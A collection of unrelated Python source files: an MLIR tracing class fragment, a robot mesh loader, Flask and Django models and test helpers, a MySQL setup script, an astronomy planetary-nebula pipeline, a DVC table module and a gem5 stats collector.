ArrayParams.from_constraints(arg.constraints)
for arg in self.epf.sig.args
]
self._python_args = [None] * len(self._args_array_params)
self._result_array_params = ArrayParams.from_constraints(
self.epf.sig.result.constraints)
# Create the MLIR function.
self._f, self._f_types = self._create_mlir_function()
self._create_trace_roots()
@property
def entry_block(self) -> _ir.Block:
return self._f.regions[0].blocks[0]
def trace(self):
# Invoke the python function with placeholders.
# TODO: More sophisticated signature merging
# TODO: Multiple results
# TODO: Error reporting
ic = self._ic
ic.insert_end_of_block(self.entry_block)
with ic.context:
py_results = (self.epf.pyfunc(*self._python_args),)
if len(py_results) != len(self._f_types):
raise TracingError("Traced function returned != %d results: %r" % (
len(self._f_types),
py_results,
))
# Narrow all results to the declared return types.
return_operands = []
for py_result, mlir_result_type in zip(py_results, self._f_types):
mlir_result = self.get_traced_array_value(py_result)
# narrow to declared result type.
return_operands.extend(
numpy_ops.NarrowOp(mlir_result_type,
mlir_result,
loc=ic.loc,
ip=ic.ip).results)
std_ops.ReturnOp(return_operands, loc=ic.loc, ip=ic.ip)
ic.pop_ip()
def set_traced_array(self, traced_array, value):
"""Sets the current SSA value for a traced_array."""
assert isinstance(traced_array, TracedArray)
self._traced_arrays[traced_array] = value
def get_traced_array_value(self, traced_array):
if not isinstance(traced_array, TracedArray):
# Generic import of external value. For now, we just treat these as
# local consts.
return self._get_external_array_value(traced_array)
traced_value = self._traced_arrays.get(traced_array)
if traced_value is None:
raise TracingError("Unregistered traced array: %r", (traced_array,))
return traced_value
def _get_external_array_value(self, external_array):
ic = self._ic
if not isinstance(external_array, np.ndarray):
raise TracingError("Expected ndarray but got: %r" % (external_array,))
found_it = self._external_arrays.get(id(external_array))
if found_it:
return found_it[1]
# Import it.
dense_attr = _ir.DenseElementsAttr.get(external_array, context=ic.context)
const_value = std_ops.ConstantOp(dense_attr.type,
dense_attr,
loc=ic.loc,
ip=ic.ip).result
self._external_arrays[id(external_array)] = (external_array, const_value)
return const_value
def _validate(self):
if not all(
arg.type_class == TypeClass.NdArray for arg in self.epf.sig.args):
raise NotImplementedError("Non NdArray args: %r" % (self.epf.sig.args,))
if not self.epf.sig.result.type_class == TypeClass.NdArray:
raise NotImplementedError("Non NdArray result: %r" %
(self.epf.sig.result,))
def _create_mlir_function(self):
ic = self._ic
epf = self.epf
f_args = [
_ir.Type.parse(ap.mlir_tensor_type_asm)
for ap in self._args_array_params
]
f_types = [_ir.Type.parse(self._result_array_params.mlir_tensor_type_asm)]
ic.insert_end_of_block(ic.module.body)
f_type = _ir.FunctionType.get(f_args, f_types)
f, _ = ic.FuncOp(epf.__name__, f_type, create_entry_block=True)
return f, f_types
def _create_trace_roots(self):
entry_block = self.entry_block
for index, ap in enumerate(self._args_array_params):
if ap is not None:
ta = TracedArray(self)
self.set_traced_array(ta, entry_block.arguments[index])
self._python_args[index] = ta
def _resolve_input_ssa_values(self, trace_values: Iterable[TraceValue]):
"""Resolves input python values to SSA values."""
ssa_values = []
for tv in trace_values:
assert tv.type == TraceValueType.NDARRAY, (
"Unsupported TraceValueType: %r" % tv.type)
ssa_value = self.get_traced_array_value(tv.value)
ssa_values.append(ssa_value)
return ssa_values
def _resolve_result_py_values(self,
trace_value_types: Iterable[TraceValueType],
ssa_values):
"""Resolves result SSA values to runtime python values."""
assert len(trace_value_types) == len(ssa_values), (
"Mismatched emitter declared result types and results")
py_values = []
for trace_value_type, ssa_value in zip(trace_value_types, ssa_values):
assert trace_value_type == TraceValueType.NDARRAY, (
"Unsupported TraceValueType: %r" % trace_value_type)
py_value = TracedArray(self)
self.set_traced_array(py_value, ssa_value)
py_values.append(py_value)
return py_values
def _emit_invocation(self, emitter: FuncEmitter, invocation: TraceInvocation):
tv_map = emitter.map_invocation(invocation)
input_ssa_values = self._resolve_input_ssa_values(tv_map.input_trace_values)
request = EmissionRequest(input_ssa_values, ic=self._ic, extra=tv_map.extra)
result_ssa_values = emitter.emit(request)
py_values = self._resolve_result_py_values(tv_map.result_trace_value_types,
result_ssa_values)
return emitter.map_results(py_values, tv_map.extra)
def _handle_ufunc(self, ufunc, method, inputs, kwargs):
emitter = self.module_builder.emitters.lookup_ufunc(ufunc, method)
if not emitter:
return NotImplemented
invocation = TraceInvocation(inputs, kwargs, Protocol.UFUNC, method)
return self._emit_invocation(emitter, invocation)
def _handle_array_func(self, func, types, inputs, kwargs):
emitter = self.module_builder.emitters.lookup_array_func(func)
if not emitter:
return NotImplemented
invocation = TraceInvocation(inputs, kwargs, Protocol.ARRAY_FUNC)
return self._emit_invocation(emitter, invocation)
def _emit_slice_value(self, slice_element):
ic = self._ic
    if slice_element is None:
return basicpy_ops.SingletonOp(ic.none_type, loc=ic.loc, ip=ic.ip).result
    elif slice_element is Ellipsis:
return basicpy_ops.SingletonOp(ic.ellipsis_type, loc=ic.loc,
ip=ic.ip).result
elif isinstance(slice_element, int):
return std_ops.ConstantOp(ic.index_type,
_ir.IntegerAttr.get(ic.index_type,
slice_element),
loc=ic.loc,
ip=ic.ip).result
elif isinstance(slice_element, slice):
return self._emit_slice_object(slice_element)
else:
# Assume array convertible.
raise NotImplementedError(
"TODO: Slicing with generic arrays not yet implemented")
def _emit_slice_object(self, slice_object: slice):
ic = self._ic
def emit_index(index):
if index is None:
return basicpy_ops.SingletonOp(ic.none_type, loc=ic.loc,
ip=ic.ip).result
else:
return std_ops.ConstantOp(ic.index_type,
_ir.IntegerAttr.get(ic.index_type,
int(index)),
loc=ic.loc,
ip=ic.ip).result
start = emit_index(slice_object.start)
stop = emit_index(slice_object.stop)
step = emit_index(slice_object.step)
result_type = _cext.slot_object_type(ic.context, "slice",
[start.type, stop.type, step.type])
return basicpy_ops.SlotObjectMakeOp(result_type, [start, stop, step],
loc=ic.loc,
ip=ic.ip).result
def _handle_array_getitem(self, array, key):
ic = self._ic
array_value = self.get_traced_array_value(array)
# Array slicing is always based on a tuple.
slice_tuple = key if isinstance(key, tuple) else (key,)
# Resolve and emit each slice element.
slice_values = [self._emit_slice_value(elt) for elt in slice_tuple]
result_value = numpy_ops.GetSliceOp(ic.unknown_array_type,
array_value,
slice_values,
loc=ic.loc,
ip=ic.ip).result
result_array = TracedArray(self)
self.set_traced_array(result_array, result_value)
return result_array
if __name__ == "__main__":
import doctest
doctest.testmod()
|
# Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import os
import numpy as np
import pyrender
import trimesh
from ..urdf import URDFReader
class MeshLoader():
"""Loads appropriate meshes based on active URDF"""
def __init__(self, include_t: bool = False):
self.ureader = URDFReader()
# Able to include/exclude T
if include_t:
self.name_list = self.ureader.mesh_names
self.mesh_list = self.ureader.mesh_paths
else:
self.name_list = self.ureader.mesh_names[:-1]
self.mesh_list = self.ureader.mesh_paths[:-1]
self.load()
def load(self):
"""Read in mesh files to Pyrender meshes"""
self._meshes = []
for file in self.mesh_list:
tm = trimesh.load(os.path.join(os.getcwd(),file))
self._meshes.append(pyrender.Mesh.from_trimesh(tm,smooth=True))
@property
def meshes(self):
return self._meshes
@property
def names(self):
return self.name_list
@property
def meshes_and_names(self):
return self._meshes, self.name_list
def angToPoseArr(yaw,pitch,roll, arr = None):
"""Returns 4x4 pose array.
Converts rotations to a pose array
"""
# Takes pitch, roll, yaw and converts into a pose arr
angs = np.array([yaw,pitch,roll])
c = np.cos(angs)
s = np.sin(angs)
if arr is None:
pose = np.zeros((4,4))
else:
pose = arr
pose[0,0] = c[0] * c[1]
pose[1,0] = c[1] * s[0]
pose[2,0] = -1 * s[1]
pose[0,1] = c[0] * s[1] * s[2] - c[2] * s[0]
pose[1,1] = c[0] * c[2] + np.prod(s)
pose[2,1] = c[1] * s[2]
pose[0,2] = s[0] * s[2] + c[0] * c[2] * s[1]
pose[1,2] = c[2] * s[0] * s[1] - c[0] * s[2]
pose[2,2] = c[1] * c[2]
pose[3,3] = 1.0
return pose
def translatePoseArr(x,y,z, arr = None):
"""Returns 4x4 pose array.
Translates a pose array
"""
if arr is None:
pose = np.zeros((4,4))
else:
pose = arr
pose[0,3] = x
pose[1,3] = y
pose[2,3] = z
return pose
def makePose(x,y,z,pitch,roll,yaw):
"""Returns 4x4 pose array.
Makes pose array given positon and angle
"""
pose = angToPoseArr(yaw,pitch,roll)
pose = translatePoseArr(x,y,z,pose)
return pose
def setPoses(scene, nodes, poses):
"""
Set all the poses of objects in a scene
"""
for node, pose in zip(nodes,poses):
scene.set_pose(node,pose)
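# Hedged sanity-check sketch for the pose helpers above (pure NumPy; the numbers are
# arbitrary example values, not calibration data). Defined only, since this module is
# normally imported as part of the package rather than run directly.
def _pose_example():
    pose = makePose(x=0.1, y=0.0, z=0.5, pitch=0.0, roll=0.0, yaw=np.pi / 2)
    # 4x4 homogeneous transform: a ~90 degree yaw plus a translation of (0.1, 0, 0.5)
    return pose.round(3)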
|
import json
from config.helper_model import ModuleHelper, db
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy.orm import validates
class UserModel(ModuleHelper):
"""
    When creating a new user: after making the instance and before saving, call instance.hashed_password(password) to store a hashed password (see the usage sketch below this class).
"""
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
password = db.Column(db.String(250), nullable=False)
@validates('password')
def validate_password(self, key, password):
        if not any(ch.isdigit() for ch in password):
            raise ValueError("Password must contain at least one number")
        if len(password) < 4:
            raise ValueError("Password must be at least four characters")
return password
def hashed_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, user_password):
return check_password_hash(self.password, user_password)
def save(self):
db.session.add(self)
db.session.commit()
def to_json(self):
return {"id": self.id, "name": self.name}
class TaxModel(ModuleHelper):
__tablename__ = 'tax'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
price = db.Column(db.Integer)
cars = db.relationship('CarModel', backref='cars', lazy='dynamic')
class CarModel(ModuleHelper):
__tablename__ = 'car'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
card = db.Column(db.String(250), unique=True)
tax_id = db.Column(db.Integer, db.ForeignKey('tax.id'))
def to_json(self):
tax_name = TaxModel.find_by_id(self.tax_id)
return {'name': self.name, 'card': self.card, "tax_id": self.tax_id, "tax_name": tax_name.name}
class ParkingModel(db.Model):
__tablename__ = 'lot'
id = db.Column(db.Integer, primary_key=True)
car_id = db.Column(db.Integer, db.ForeignKey('car.id'))
    in_lot = db.Column(db.DateTime, default=datetime.now)  # pass the callable so the timestamp is taken at insert time
out_lot = db.Column(db.DateTime, default=None)
def __repr__(self):
        return str(CarModel.find_by_id(self.car_id))  # __repr__ must return a string
def to_json(self):
a = CarModel.find_by_id(self.car_id)
return {'name': a.name, 'in': str(self.in_lot)}
def save_to_db(self):
db.session.add(self)
db.session.commit()
|
import MySQLdb
import sys
from secret import config
# Database configuration saved in secret.py
# The secret.py file should contain something like this
# config = {
# 'host': 'localhost',
# 'user': 'root',
# 'passwd': 'SECRET',
# }
def assays_db():
"""
Connect to MySQL, and attempt to create or select the assays database.
Then, create a new, blank assays table, and return it.
"""
db = MySQLdb.connect(**config)
cursor = db.cursor()
    # Select the DB, or create it if none exists.
try:
db.select_db('assays')
except:
# Create a database
try:
cursor.execute("CREATE DATABASE assays;")
db.select_db('assays')
except:
print "Database creation or selection failed."
sys.exit(1)
# Create a blank table to store lab data.
try:
cursor.execute("DROP TABLE IF EXISTS assays;")
cursor.execute("""
CREATE TABLE assays (
certificate VARCHAR(20) NOT NULL,
sample_id VARCHAR(20) NOT NULL,
material VARCHAR(20) NOT NULL,
method VARCHAR(20),
units VARCHAR(10),
run INT,
value DECIMAL(13,5)
);
""")
except:
print "Unable to create a new assays table."
sys.exit(1)
return cursor
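if __name__ == '__main__':
    # Hedged usage sketch: the row below contains made-up example values. Note that
    # assays_db() returns only a cursor, so a commit on the underlying connection is
    # still required before the data is persisted.
    cursor = assays_db()
    cursor.execute(
        "INSERT INTO assays (certificate, sample_id, material, method, units, run, value) "
        "VALUES (%s, %s, %s, %s, %s, %s, %s);",
        ("CERT-001", "S-0001", "ore", "ICP-MS", "ppm", 1, 12.345))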
|
'''production script for planetary nebula
this script is a streamlined version of the code in planetary_nebula.ipynb.
The notebook was used for testing and peaking into some results, while
this script is used to produce the final plots/tables.
'''
import sys
from pathlib import Path
import logging
import json
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import ascii, fits
from astropy.table import Table
from astropy.coordinates import SkyCoord
from photutils import DAOStarFinder
from extinction import ccm89
from pnlf.auxiliary import search_table
from pnlf.io import ReadLineMaps
from pnlf.detection import detect_unresolved_sources, completeness_limit
from pnlf.photometry import measure_flux
from pnlf.analyse import emission_line_diagnostics, MaximumLikelihood, pnlf, Distance
from pnlf.plot.pnlf import plot_emission_line_ratio, plot_pnlf
logging.basicConfig(#filename='log.txt',
#filemode='w',
                    #format='%(levelname)s %(name)s %(message)s',
datefmt='%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
basedir = Path('..')
# load the parameters that were previously saved for each galaxy
with open(basedir / 'data' / 'interim' / 'parameters.json') as json_file:
parameters = json.load(json_file)
with fits.open(basedir / 'data' / 'raw' / 'phangs_sample_table_v1p4.fits') as hdul:
sample_table = Table(hdul[1].data)
for name in parameters.keys():
tmp = search_table(sample_table,name)
if tmp:
d = Distance(tmp['DIST'][0]*1e6,'pc').to_distance_modulus()
parameters[name]["mu"] = d
print('using mu from sample table')
'''
IC5332 NGC1087 NGC1365 NGC1512 NGC1566 NGC1672 NGC2835
NGC3351 NGC3627 NGC4254 NGC4535 NGC5068 NGC628
'''
data_raw = Path(r'd:\downloads\MUSEDAP')
basedir = Path('..')
for name in parameters.keys():
'''
Step 1: Read in the data
'''
galaxy = ReadLineMaps(data_raw / name)
setattr(galaxy,'mu',parameters[galaxy.name]['mu'])
setattr(galaxy,'alpha',parameters[galaxy.name]['power_index'])
setattr(galaxy,'completeness_limit',parameters[galaxy.name]['completeness_limit'])
'''
Step 2: Detect sources
'''
sources = detect_unresolved_sources(galaxy,
'OIII5006',
StarFinder=DAOStarFinder,
threshold=8,
save=False)
'''
Step 3: Measure fluxes
'''
flux = measure_flux(galaxy,sources, galaxy.alpha,aperture_size=2.,background='local')
for col in ['HA6562','NII6583','SII6716']:
flux[col][flux[col]<0] = flux[f'{col}_err'][flux[col]<0]
flux[col][flux[col]/flux[f'{col}_err']<3] = flux[f'{col}_err'][flux[col]/flux[f'{col}_err']<3]
# calculate astronomical coordinates for comparison
flux['SkyCoord'] = SkyCoord.from_pixel(flux['x'],flux['y'],galaxy.wcs)
# calculate magnitudes from measured fluxes
flux['mOIII'] = -2.5*np.log10(flux['OIII5006']*1e-20) - 13.74
flux['dmOIII'] = np.abs( 2.5/np.log(10) * flux['OIII5006_err'] / flux['OIII5006'] )
# correct for milky way extinction
extinction = ccm89(wave=np.array([5007.]),a_v=0.2,r_v=3.1,unit='aa')[0]
flux['mOIII'] -= extinction
'''
Step 4: Emission line diagnostics
'''
tbl = emission_line_diagnostics(flux,galaxy.mu,galaxy.completeness_limit)
filename = basedir / 'reports' / 'catalogues' / f'pn_candidates_{galaxy.name}.txt'
with open(filename,'w',newline='\n') as f:
tbl['RaDec'] = tbl['SkyCoord'].to_string(style='hmsdms',precision=2)
for col in tbl.colnames:
if col not in ['id','RaDec','type']:
tbl[col].info.format = '%.3f'
ascii.write(tbl[['id','type','x','y','RaDec','OIII5006','OIII5006_err','mOIII','dmOIII','HA6562','HA6562_err',
'NII6583','NII6583_err','SII6716','SII6716_err']][tbl['type']!='NaN'],
f,format='fixed_width',delimiter='\t',overwrite=True)
filename = basedir / 'reports' / 'figures' / f'{galaxy.name}_emission_line'
plot_emission_line_ratio(tbl,galaxy.mu,filename=filename)
'''
Step 5: Fit with maximum likelihood
'''
data = tbl[(tbl['type']=='PN') & (tbl['mOIII']<galaxy.completeness_limit)]['mOIII']
err = tbl[(tbl['type']=='PN') & (tbl['mOIII']<galaxy.completeness_limit)]['dmOIII']
#data = data[data>26]
fitter = MaximumLikelihood(pnlf,
data,
mhigh=galaxy.completeness_limit)
# a good guess would be mu_guess = min(data)-Mmax
mu = fitter([24])[0]
filename = basedir / 'reports' / 'figures' / f'{galaxy.name}_PNLF'
plot_pnlf(tbl[tbl['type']=='PN']['mOIII'],mu,galaxy.completeness_limit,binsize=0.25,mhigh=32,filename=filename)
print(f'{galaxy.name}: {mu:.2f} vs {parameters[galaxy.name]["mu"]:.2f}')
|
from collections.abc import Mapping
from itertools import chain, repeat, zip_longest
from operator import itemgetter
from typing import (
TYPE_CHECKING,
Any,
Dict,
ItemsView,
Iterable,
Iterator,
List,
MutableSequence,
Sequence,
Tuple,
Union,
overload,
)
from funcy import reraise
if TYPE_CHECKING:
from dvc.ui.table import CellT
class Column(List["CellT"]):
pass
def with_value(value, default):
return default if value is None else value
class TabularData(MutableSequence[Sequence["CellT"]]):
def __init__(self, columns: Sequence[str], fill_value: str = ""):
self._columns: Dict[str, Column] = {name: Column() for name in columns}
self._keys: List[str] = list(columns)
self._fill_value = fill_value
@property
def columns(self) -> List[Column]:
return list(map(self.column, self.keys()))
def column(self, name: str) -> Column:
return self._columns[name]
def items(self) -> ItemsView[str, Column]:
projection = {k: self.column(k) for k in self.keys()}
return projection.items()
def keys(self) -> List[str]:
return self._keys
def _iter_col_row(
self, row: Sequence["CellT"]
) -> Iterator[Tuple["CellT", Column]]:
for val, col in zip_longest(row, self.columns):
if col is None:
break
yield with_value(val, self._fill_value), col
def append(self, value: Sequence["CellT"]) -> None:
for val, col in self._iter_col_row(value):
col.append(val)
def extend(self, values: Iterable[Sequence["CellT"]]) -> None:
for row in values:
self.append(row)
def insert(self, index: int, value: Sequence["CellT"]) -> None:
for val, col in self._iter_col_row(value):
col.insert(index, val)
def __iter__(self) -> Iterator[List["CellT"]]:
return map(list, zip(*self.columns))
def __getattr__(self, item: str) -> Column:
with reraise(KeyError, AttributeError):
return self.column(item)
def __getitem__(self, item: Union[int, slice]):
func = itemgetter(item)
it = map(func, self.columns)
if isinstance(item, slice):
it = map(list, zip(*it))
return list(it)
@overload
def __setitem__(self, item: int, value: Sequence["CellT"]) -> None:
...
@overload
def __setitem__(
self, item: slice, value: Iterable[Sequence["CellT"]]
) -> None:
...
def __setitem__(self, item, value) -> None:
it = value
if isinstance(item, slice):
n = len(self.columns)
normalized_rows = (
chain(val, repeat(self._fill_value, n - len(val)))
for val in value
)
# we need to transpose those rows into columnar format
# as we work in terms of column-based arrays
it = zip(*normalized_rows)
for i, col in self._iter_col_row(it):
col[item] = i
def __delitem__(self, item: Union[int, slice]) -> None:
for col in self.columns:
del col[item]
def __len__(self) -> int:
return len(self.columns[0])
@property
def shape(self) -> Tuple[int, int]:
return len(self.columns), len(self)
def drop(self, *col_names: str) -> None:
for col_name in col_names:
self._keys.remove(col_name)
self._columns.pop(col_name)
def rename(self, from_col_name: str, to_col_name: str) -> None:
self._columns[to_col_name] = self._columns.pop(from_col_name)
self._keys[self._keys.index(from_col_name)] = to_col_name
def project(self, *col_names: str) -> None:
self.drop(*(set(self._keys) - set(col_names)))
self._keys = list(col_names)
def to_csv(self) -> str:
import csv
from io import StringIO
buff = StringIO()
writer = csv.writer(buff)
writer.writerow(self.keys())
for row in self:
writer.writerow(row)
return buff.getvalue()
def add_column(self, name: str) -> None:
self._columns[name] = Column([self._fill_value] * len(self))
self._keys.append(name)
def row_from_dict(self, d: Dict[str, "CellT"]) -> None:
keys = self.keys()
for key in d:
if key not in keys:
self.add_column(key)
row: List["CellT"] = [
with_value(d.get(key), self._fill_value) for key in self.keys()
]
self.append(row)
def render(self, **kwargs: Any):
from dvc.ui import ui
ui.table(self, headers=self.keys(), **kwargs)
def as_dict(self, cols: Iterable[str] = None) -> Iterable[Dict[str, str]]:
keys = self.keys() if cols is None else set(cols)
return [
{k: self._columns[k][i] for k in keys} for i in range(len(self))
]
def _normalize_float(val: float, precision: int):
return f"{val:.{precision}g}"
def _format_field(
val: Any, precision: int = None, round_digits: bool = False
) -> str:
def _format(_val):
if isinstance(_val, float) and precision:
func = round if round_digits else _normalize_float
return func(_val, precision)
if isinstance(_val, Mapping):
return {k: _format(v) for k, v in _val.items()}
if isinstance(_val, list):
return [_format(x) for x in _val]
return _val
return str(_format(val))
def diff_table(
diff,
title: str,
old: bool = True,
no_path: bool = False,
show_changes: bool = True,
precision: int = None,
round_digits: bool = False,
on_empty_diff: str = None,
) -> TabularData:
headers: List[str] = ["Path", title, "Old", "New", "Change"]
fill_value = "-"
td = TabularData(headers, fill_value=fill_value)
for fname, diff_in_file in diff.items():
for item, change in sorted(diff_in_file.items()):
old_value = with_value(change.get("old"), fill_value)
new_value = with_value(change.get("new"), fill_value)
diff_value = with_value(
change.get("diff", on_empty_diff), fill_value
)
td.append(
[
fname,
str(item),
_format_field(old_value, precision, round_digits),
_format_field(new_value, precision, round_digits),
_format_field(diff_value, precision, round_digits),
]
)
if no_path:
td.drop("Path")
if not show_changes:
td.drop("Change")
if not old:
td.drop("Old")
td.rename("New", "Value")
return td
def show_diff(
diff,
title: str,
old: bool = True,
no_path: bool = False,
show_changes: bool = True,
precision: int = None,
round_digits: bool = False,
on_empty_diff: str = None,
markdown: bool = False,
) -> None:
td = diff_table(
diff,
title=title,
old=old,
no_path=no_path,
show_changes=show_changes,
precision=precision,
round_digits=round_digits,
on_empty_diff=on_empty_diff,
)
td.render(markdown=markdown)
def metrics_table(
metrics,
all_branches: bool = False,
all_tags: bool = False,
all_commits: bool = False,
precision: int = None,
round_digits: bool = False,
):
from dvc.utils.diff import format_dict
from dvc.utils.flatten import flatten
td = TabularData(["Revision", "Path"], fill_value="-")
for branch, val in metrics.items():
for fname, metric in val.items():
row_data: Dict[str, str] = {"Revision": branch, "Path": fname}
flattened = (
flatten(format_dict(metric))
if isinstance(metric, dict)
else {"": metric}
)
row_data.update(
{
k: _format_field(v, precision, round_digits)
for k, v in flattened.items()
}
)
td.row_from_dict(row_data)
rev, path, *metrics_headers = td.keys()
td.project(rev, path, *sorted(metrics_headers))
if not any([all_branches, all_tags, all_commits]):
td.drop("Revision")
return td
def show_metrics(
metrics,
markdown: bool = False,
all_branches: bool = False,
all_tags: bool = False,
all_commits: bool = False,
precision: int = None,
round_digits: bool = False,
) -> None:
td = metrics_table(
metrics,
all_branches=all_branches,
all_tags=all_tags,
all_commits=all_commits,
precision=precision,
round_digits=round_digits,
)
td.render(markdown=markdown)
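if __name__ == "__main__":
    # Hedged usage sketch of TabularData on its own (CSV output only; render() would
    # additionally require dvc's console UI to be available).
    td = TabularData(["name", "metric"], fill_value="-")
    td.extend([["train", "0.91"], ["val"]])  # the short row is padded with fill_value
    td.add_column("note")
    print(td.to_csv())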
|
from django.contrib.auth.models import User
from mixer.backend.django import mixer
import base64
from socialDistribution.models import LocalAuthor
TEST_PASSWORD = "123456"
def create_author():
user = mixer.blend(User)
user.set_password(TEST_PASSWORD)
user.save()
author = LocalAuthor.objects.create(username=user.username, user=user)
return LocalAuthor.objects.get(id=author.id) # refetch to get the generated ID
def get_basic_auth(author):
username = author.user.username
credentials = str.encode(f'{username}:{TEST_PASSWORD}')
return {
'HTTP_AUTHORIZATION': 'Basic %s' % base64.b64encode(credentials).decode("ascii"),
}
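# Hedged usage sketch (commented out): how these helpers might be combined inside a
# Django TestCase. The endpoint path is illustrative and not part of this project.
#
# from django.test import TestCase
#
# class ExampleAuthTest(TestCase):
#     def test_basic_auth_request(self):
#         author = create_author()
#         response = self.client.get("/api/authors/", **get_basic_auth(author))
#         self.assertNotEqual(response.status_code, 401)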
|
import glob
import os
dir_names = glob.glob("prefetch_*")
names = []
miss_rates = []
for dir_name in dir_names:
os.chdir(dir_name)
myCmd = os.popen('grep "l2.overall_miss_rate::total" stats.txt').readlines()
print(myCmd)
line = myCmd[1].strip()
temp = dir_name.split("_")
name = "".join([temp[1], "_", temp[2]])
names.append(name)
miss_rate = line.split()[1]
miss_rates.append(miss_rate)
os.chdir("../")
names_csv = ','.join(names)
miss_rates_csv = ','.join(miss_rates)
with open("results.csv", "w") as results:
results.write(names_csv + "\n")
results.write(miss_rates_csv)
|